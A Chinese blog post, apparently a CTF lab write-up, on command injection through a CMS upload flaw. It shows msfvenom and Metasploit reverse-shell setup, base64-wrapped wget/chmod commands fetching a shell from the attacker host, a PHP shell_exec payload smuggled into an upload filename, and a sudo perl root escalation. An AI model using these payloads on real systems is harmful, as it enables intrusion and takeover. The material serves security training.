CTF-18.web安全命令注入

最新推荐文章于 2024-04-10 17:21:46 发布
最新推荐文章于 2024-04-10 17:21:46 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: ctf 文章标签: web安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woo233/article/details/127209257
版权

实验环境

攻击机: 192.168.1.106
靶场机器: 192.168.1.104

信息探测

扫描主机服务信息以及服务版本

  • nmap -sV 靶场IP地址

在这里插入图片描述

快速扫描主机全部信息

  • nmap -T4 -A -v 靶场IP地址
    探测目录信息

  • nikto -host http:/ /靶场IP地址端口
    在这里插入图片描述

  • dirb htp://靶场IP地址端口
    在这里插入图片描述
    打开robots.txt:
    在这里插入图片描述
    尝试打开这五个界面:
    在这里插入图片描述

在这里插入图片描述
此界面源代码如下:
在这里插入图片描述

接下来对其他敏感信息进行挖掘
在这里插入图片描述
打开浏览器之后发现一个压缩包,将其下载:
在这里插入图片描述
然后在网页上发现打开这个压缩包需要密码:
在这里插入图片描述
使用前面发现的密码进行尝试,解压成功,但需要通过file命令进行查看,为何种类型的文件
在这里插入图片描述
复制url进行打开:
在这里插入图片描述
使用前面发现的5个密码进行尝试。登陆到后台的界面:
在这里插入图片描述
登录-利用exploitdb
利用挖掘到的用户名和密码登陆系统,然后对系统是否使用某种CMS、SMS等进行查看 。
利用现成的EXP进行渗透。

渗透测试技巧
使用searchsploit来查看系统是否有对应漏洞

searchsploit 对应的系统

在这里插入图片描述

在这里插入图片描述
使用cat命令进行查看或者也可使用这个网页进行查看漏洞信息
https:/ /www.exploit-db.com/exploits/42003/
在这里插入图片描述
发现存在上传漏洞,在网页中打开上传位置
在这里插入图片描述
发现send from file,可以上传文件
在这里插入图片描述
这里提示上传csv文件,touch 1.csv
在这里插入图片描述
在这里插入图片描述
上传成功:
在这里插入图片描述
打开burpsuite
在这里插入图片描述
使用burpsuite,需要先设置浏览器的代理,
在这里插入图片描述
在网页中重新上传文件,burpsuite中会出现对应的数据报
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

准备shell

启用metasploit监听

msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter_reverse_tcp.
msf exploit(handler) > set lhost 192.168.1.106
msf. exploit(handler) > set lport 4444
msf. exploit(handler) > run

在这里插入图片描述
在这里插入图片描述
exploit开始监听
在这里插入图片描述

生成shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=1 92.168.1.106 lport =4444 -f elf >
/var/www /html/shell
在这里插入图片描述
在这里插入图片描述

绕过防火墙 上传shell

利用base64绕过防火墙检测

-- service apache2 start
-- echo 'wget http:/ /攻击机IP地址/shell -O /tmp/shell' | base64
-- echo 'chmod 777 /tmp/shell' | base64
-- echo '/tmp/ shell' | base64

在这里插入图片描述
在这里插入图片描述
获取反弹shell,不断的上传csv文件,然后用burpsuite截断,并修改信息
使用burpsuite 修改filename参数内容
–“<?php shell_exec(base64_decode("前面加密的信息')); die();?> .php”
在这里插入图片描述
查看kali终端的监听效果:
在这里插入图片描述

提升权限、获取Flag

登录服务器之后,反弹的shelI的用户是www-data。并不具备roor权限。
使用sude.-I查看www-data用户的sudo权限;
根据提示执行以下命令(现实渗透中,肯定存在这样的问题。程序员为了方便,便设置了不需要密码
就可以执行sudo的操作)
– sudo perl -e "exec ‘/bin/sh’”
– bash -i
在这里插入图片描述

查看flag值
cat flag
在这里插入图片描述
.

总结:

上传webshell获取控制权
使用burpsuite绕过上传过滤机制,绕过前端检测机制,或%00截断绕过;
执行shell,获取反弹shell.

wow2ok
关注
专栏目录
CTF命令注入(Dina 1.0)
afei001
04-01 574
练习环境     攻击机:kali     靶机:Ubuntu 12.04(Dina 1.0) 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255....
CTF---Web---SQL注入---01---万能密码+sqlmap
qq_22160557的博客
07-29 3724
文章目录前言一、题目描述二、解题步骤1. 万能密码登录2. sqlmap爆库3. 爆表4. 爆列5. 爆字段三、总结 前言 题目分类: CTFWeb—SQL注入—01—万能密码+sqlmap 一、题目描述 题目:SQL注入 链接:192.168.87.172 二、解题步骤 1. 万能密码登录 Step1:尝试万能密码:user=‘=’,pass=‘=’,输入后登录成功,注入点在此 2. sqlmap爆库 Step2:源代码中提示,提交方法为POST,所以此题为sqlmap的post注入,采用kai
CTF-命令注入
不知名白帽的博客
05-28 1107
CTF-命令注入,实验环境:(192.168.20.128),靶机(192.168.20.141)。通过信息探测,深入挖掘隐藏信息,获取账号和密码,用searchsploit搜寻漏洞,再用msfconsole进行监听,然后用base64绕过防火墙,生成sehll,上传shell,反弹shell...
CTF-命令注入【超详细】
不知名白帽的博客
09-05 9197
CTF-命令注入【超详细】
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
CTF刷题记录CTFHub-RCE-命令注入
m_de_g的博客
07-24 4066
** CTFHub-RCE-命令注入 ** 一、解题思路 通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。 1.无任何的过滤 因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令 http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls 通过执行ls命令可以看到,该目下的文件,这是linux环境下 如果是window环境下,使用命令dir查看目录文件 我
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
5. **权限与配置管理**:学习如何利用不正确的权限设置或配置,如目录遍历和命令注入,以及如何通过正确配置服务器和应用程序来防止这些攻击。 6. **Web应用框架漏洞**:熟悉常见的Web开发框架(如WordPress、...
CTF---Web---SQL注入---11---注入列的选择与id的值
qq_22160557的博客
08-01 824
文章目录前言一、题目描述二、解题步骤1、尝试列数2、爆表的两种方式3、爆列、字段三、总结 前言 题目分类: CTFWeb—SQL注入—11—注入列的选择与id的值 一、题目描述 题目:SQL注入 二、解题步骤 1、尝试列数 Step1:尝试列数,1 union select 1,2,3,4# 列数为4列 1 union select 1,2,database(),4# 数据库名为:inject_05 2、爆表的两种方式 Step2:爆表 -1 union select 1,(select grou
CTF---Web---SQL注入---09---注入列+sql语句变形
qq_22160557的博客
07-31 449
文章目录前言一、题目描述二、解题步骤1、sql语句变形2、猜测列数3、注入列的选择4、爆表、列、字段三、总结 前言 题目分类: CTFWeb—SQL注入—09—注入列+sql语句变形 一、题目描述 题目:SQL注入 二、解题步骤 1、sql语句变形 Step1: TVE9PQ==是base64编码, 经两次解码后, 答案为数字1. 提示此次手工注入需输入的数据需经过两次base64编码的代码. 2、猜测列数 Step2: 尝试手工注入时, -1 union select 1,2#, 当尝试1,2,3
CTF---Web---SQL注入---04---F12network+XXF伪造+sqlmap跑文件
qq_22160557的博客
07-29 1169
文章目录前言一、题目描述二、解题步骤1、信息隐藏2、XXF伪造3、sqlmap文件注入三、总结 前言 题目分类: CTFWeb—SQL注入—04—F12network+XXF伪造+ sqlmap跑文件 一、题目描述 题目:Simple_Calc_1,简单计算器 提示:XFF伪造 二、解题步骤 1、信息隐藏 Step1:F12—>查看network,刷新一下,就可以看到/backend/目录, 提示:{“success”:true,“count”:2},是访问次数 2、XXF伪造 Step2:其
WEB登录防sql注入 url注入 脚本注入
12-05
WEB登录防sql注入 url注入 脚本注入
CTF-命令注入(代码执行漏洞)
su__xiaoyan的博客
01-20 1968
实验环境 攻击机:172.20.10.5 靶机:172.20.10.4 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 发现网站下的robots.txt中包含几个敏感目录 web站点详细信息探测 web目录爆破 访问robots.txt,对其中的敏感目录进行查看 其中/nothing为404页面,但是和正常的4014页面不同 查看源代码,发现网站管理员在源代码中存储了常用的密码 其中/tmp和/uploads均为空目录 尝试探测改地址允许使用的请求方法,
CTF—HTTP命令注入
IT小学子的博客
05-04 496
主机:192.168.32.152   靶机:192.168.32.167 首先nmap,nikto -host,dirb 探测 robots.txt目录下 在/nothing目录中,查看源码发现pass 在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开 然后发现mp3文件其实是text文本,cat打开 发现一段文字还有个url,打开url,用户...
CTF-命令注入绕过技巧总结
最新发布
键盘的起始页
04-10 456
执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 3091
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2342
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
ctfhub-->命令注入练习
qq2489021103的博客
04-01 669
ctfhub-web练习–>各种绕过 1.这题没有任何过滤 直接127.0.0.1;ls获取目录,找到flag,然后cat flag在注释里面。 2.这题过滤了cat 百度下php类cat方法: 127.0.0.1;ls 得到目录后 127.0.0.1; less flag_11261594711502.php 得到flag 3.过滤空格 用IFS绕过127.0.0.1;cat{IFS}绕过 127.0.0.1;catIFS绕过127.0.0.1;cat{IFS}flag_163033
渗透测试——七、网站漏洞——命令注入和跨站请求伪造(CSRF)
钟言的博客
12-07 9620
本篇为渗透测试的第七篇,网络漏洞之命令注入和跨站请求伪造(CSRF),详细内容包含了命令注入 跨站请求伪造(CSRF)命令注入页面之注人测试四、CSRF页面之请求伪造测试等等
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8797
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
Web安全:深入解析命令注入漏洞
命令注入是一种网络安全问题,其基本原理在于攻击者能够通过操纵Web应用中的输入字段,注入恶意命令,导致系统执行非预期的操作。这种攻击方式通常发生在应用程序设计时未能对用户输入进行充分验证和过滤的情况下。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值